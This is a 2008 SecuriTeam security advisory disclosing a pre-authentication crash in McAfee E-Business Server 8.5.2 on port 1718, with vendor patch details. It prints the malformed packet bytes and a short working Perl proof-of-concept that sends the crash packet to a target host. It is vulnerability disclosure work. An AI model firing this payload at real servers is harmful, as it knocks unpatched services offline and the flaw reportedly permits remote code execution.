[NEWS] McAfee E-Business Server Preauth Code DoS



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



McAfee E-Business Server Preauth Code DoS
------------------------------------------------------------------------


SUMMARY

McAfee E-Business Server "guards sensitive corporate data with
industry-standard PGP 128-bit encryption and authentication. McAfee
E-Business Server supports a variety of platforms and security
certificates". It possible to crash McAffe's E-Business Server by sending
it a malicious packet to its TCP port 1718.

DETAILS

Vulnerable Systems:
* McAfee E-Business Server version 8.5.2

It is possible to crash McAfee E-Business Server during the authentication
process. When a malformed (oversized) initial authentication packet is
sent to E-Business Server, the server will crash, and will have to be
manually restarted.

A malformed authentication packet is shown below:
"\x01\x3f\x2f\x05\x25\x2a" + "A" * 69953

McAfee further researched the vulnerability and confirmed that it allows
an attacker to also remotely execute code.

Solution:
The vendor has addressed this vulnerability with E-Business server patch
update on January 8th, 2008.

Vendor advisory and update link:

<https://knowledge.mcafee.com/SupportSite/dynamickc.do?externalId=614472&sliceId=SAL_Public&command=show&forward=nonthreadedKC&kcId=614472> https://knowledge.mcafee.com/SupportSite/dynamickc.do?externalId=614472&; sliceId=SAL_Public&command=show& forward=nonthreadedKC&kcId=614472

Exploit:
#!/usr/bin/perl
#
#
# McAfee(R) E-Business Server(TM) 8.5.2 Remote preauth crash (PoC) -
http://www.infigo.hr/files/mcafee2.pl
#
# - tested on Windows and Linux
#
#
# Leon Juranic <leon.juranic@xxxxxxxxx>,
# Infigo IS <http://www.infigo.hr/en/>
#


use IO::Socket;

$saddr = "192.168.1.3";
$sport = 1718;

$exp1 = "\x01\x3f\x2f\x05\x25\x2a" . "A" x 69953;;

print "> Sending exploit string...\n";
my $server_sock = IO::Socket::INET->new (PeerAddr => $saddr, PeerPort =>
$sport) || die ("Cannot connect to server!!!\n\n");
print $server_sock $exp1;


ADDITIONAL INFORMATION

The information has been provided by <mailto:leon.juranic@xxxxxxxxx> Leon
Juranic.
The original article can be found at:
<http://www.infigo.hr/en/in_focus/advisories/INFIGO-2008-01-06>
http://www.infigo.hr/en/in_focus/advisories/INFIGO-2008-01-06



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.